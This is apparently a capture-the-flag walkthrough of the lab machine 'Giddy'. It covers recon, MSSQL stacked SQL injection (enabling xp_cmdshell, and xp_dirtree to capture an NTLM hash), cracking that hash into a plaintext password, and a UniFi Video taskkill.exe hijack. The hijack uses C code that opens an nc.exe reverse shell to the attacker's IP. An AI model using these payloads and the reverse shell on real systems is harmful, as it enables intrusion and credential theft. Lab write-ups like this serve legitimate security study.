Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-23 23:28 IST
Nmap scan report for 10.10.10.104
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2024-02-23T17:58:31+00:00; -1s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-23T17:58:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2024-02-22T17:56:46
|_Not valid after: 2024-08-23T17:56:46
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.73 seconds
➜ Giddy gobuster dir -u http://10.10.10.104 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.104
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 157] [--> http://10.10.10.104/aspnet_client/]
/. (Status: 200) [Size: 700]
/remote (Status: 302) [Size: 157] [--> /Remote/default.aspx?ReturnUrl=%2fremote]
/Remote (Status: 302) [Size: 157] [--> /Remote/default.aspx?ReturnUrl=%2fRemote]
/Aspnet_client (Status: 301) [Size: 157] [--> http://10.10.10.104/Aspnet_client/]
/mvc (Status: 301) [Size: 147] [--> http://10.10.10.104/mvc/]
Interesting paths: /remote and /mvc.
/Remote redirects to /Remote/default.aspx, and the certificate CN on 443 (PowerShellWebAccessTestWebSite) says this is PowerShell Web Access, so it is a login form worth remembering once we have credentials. /mvc is the application with the ProductSubCategoryId parameter used below.
Testing for SQLi
Running sqlmap against the ProductSubCategoryId parameter dumped the database, but nothing in it was useful.
The backend is MSSQL and the parameter accepts stacked queries, so instead of reading data I'll make the SQL Server connect back to my Responder listener over SMB and capture the NetNTLMv2 hash of the account the service runs as.
Reference: https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
xp_cmdshell is disabled by default and enabling it needs sysadmin; each sp_configure has to be followed by RECONFIGURE, and the output of a stacked query is not reflected in the page, so this part is blind:
?ProductSubCategoryId=27;EXEC sp_configure 'show advanced options', 1;--
?ProductSubCategoryId=12;RECONFIGURE;--
?ProductSubCategoryId=12;EXEC sp_configure 'xp_cmdshell', 1;--
?ProductSubCategoryId=12;RECONFIGURE;--
?ProductSubCategoryId=27;EXEC xp_cmdshell 'net user';--
Turn on Responder on the VPN interface:
sudo responder -I tun0
Then trigger an outbound SMB connection with xp_dirtree. The UNC path makes the server authenticate to my host with NTLM, and xp_dirtree does not depend on xp_cmdshell being enabled, so this step alone is enough for the capture:
?ProductSubCategoryId=1; use master; exec xp_dirtree '\\10.10.14.29\SHARE';--
Responder catches the authentication. The line is in NetNTLMv2 format (user::domain:server challenge:NTProofStr:blob), which is hashcat mode 5600:
Stacy::GIDDY:8ab6efdb18cb541b:[rest of hash truncated]
Cracking the hash with hashcat (hashcat -m 5600 hash.txt wordlist) gives:
stacy:xNnWo6272k7x
I'll try to log in with Evil-WinRM using these creds (5985/tcp is open):
evil-winrm -u stacy -p 'xNnWo6272k7x' -i 10.10.10.104
It works.
The unifi-video directory under C:\ProgramData is a hint for privesc: UniFi Video has a local privilege escalation exploit on Exploit-DB.
https://www.exploit-db.com/exploits/43390
I created a reverse shell with msfvenom but it did not work because of the firewall; I have to bypass it.
I'll get the PowerShell history file. HistorySavePath reports the file name for this (WinRM) host, but the file left behind by Stacy's interactive console sessions is ConsoleHost_history.txt in the same directory:
C:\programdata\unifi-video> (Get-PSReadLineOption).HistorySavePath
C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt
*Evil-WinRM* PS C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline> type ConsoleHost_history.txt
net stop unifivideoservice
$ExecutionContext.SessionState.LanguageMode
Stop-Service -Name Unifivideoservice -Force
Get-Service -Name Unifivideoservice
whoami
Get-Service -ServiceName UniFiVideoService
The history shows Stacy stopping and querying the UniFi Video service, so she has the rights to control it. That is exactly what the Exploit-DB entry needs: when the service is stopped it runs taskkill.exe from its own directory (C:\ProgramData\unifi-video) as SYSTEM, so a user who can write there and stop the service gets code execution as SYSTEM.
I was not able to use the msfvenom reverse shell, so I'll build a small executable that reads root.txt and copies it to Stacy's Desktop.
hello.c ->
#include <stdlib.h>

/* Runs as SYSTEM when the UniFi Video service stops and executes taskkill.exe
 * from C:\ProgramData\unifi-video; copy the root flag somewhere Stacy can read it. */
int main(void)
{
    system("type C:\\users\\Administrator\\Desktop\\root.txt > C:\\users\\stacy\\Desktop\\hello.txt");
    return 0;
}
Compile it to a Windows exe named taskkill.exe ->
i686-w64-mingw32-gcc -o taskkill.exe hello.c
Copy it to the target with curl into C:\ProgramData\unifi-video, then stop the service:
Stop-Service "Ubiquiti UniFi Video" -Force
Without getting a root shell I won't get peace, and I need peace.
I uploaded nc.exe to the target at C:\Windows\Tasks\nc.exe and updated the C program to execute nc.exe and give us a shell:
hello.c
#include <stdlib.h>

/* Same trigger as before, but instead of copying the flag spawn a reverse shell
 * to a listener on port 9001 on the attacking host. */
int main(void) {
    system("C:/windows/tasks/nc.exe -e cmd.exe 10.10.14.29 9001");
    return 0;
}
i686-w64-mingw32-gcc -o taskkill.exe hello.c
Copied the exe to the target (from the Evil-WinRM session, in C:\ProgramData\unifi-video) and stopped the service again:
curl http://10.10.14.29/taskkill.exe -o taskkill.exe
Stop-Service "Ubiquiti UniFi Video" -Force
Root